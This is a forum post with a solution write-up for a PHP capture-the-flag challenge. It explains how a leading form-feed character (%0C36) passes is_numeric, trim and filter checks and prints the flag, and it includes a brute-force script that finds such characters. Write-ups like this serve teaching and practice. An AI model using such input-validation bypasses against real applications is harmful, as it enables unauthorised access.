CTF-30解题思路

Track-子羽   ·   发表于 2021-11-17 15:20:23   ·   CTF&WP专版

源码分析:

  1. <?php
  2. include('flag.php');
  3. highlight_file(__FILE__);
  4. error_reporting(0);
  5. function filter($num)
  6. {
  7. $num=str_replace("0x","1",$num);
  8. $num=str_replace("0","1",$num);
  9. $num=str_replace(".","1",$num);
  10. $num=str_replace("e","1",$num);
  11. $num=str_replace("+","1",$num);
  12. return $num;
  13. } $num=$_GET['num'];
  14. if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36')
  15. {
  16. if($num=='36')
  17. {
  18. echo $flag;
  19. }
  20. else
  21. {
  22. echo "hacker!!";
  23. }
  24. }
  25. else
  26. {
  27. echo "hacker!!!";
  28. }
  29. ?>

代码审计可知
需要满足:num通过is_numeric的检测,并且不等于36,去空后依然不等于36,经过过滤方法后依然等于36

构造POC:

  1. <?php
  2. for($i = 0; $i<129; $i++)
  3. {
  4. $num=chr($i).'36';
  5. if(trim($num)!=='36' && is_numeric($num) && $num!=='36')
  6. {
  7. echo urlencode(chr($i))."\n";
  8. }
  9. }
  10. ?>

对照ASCII码表http://ascii.911cha.com/)
得到:%0C %2B(+) - . 0 1 2 3 4 5 6 7 8 9

payload:

  1. ?num=%0C36

打赏我,让我更有动力~

0 Reply   |  Until 22天前 | 43 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2021 掌控者 All Rights Reserved.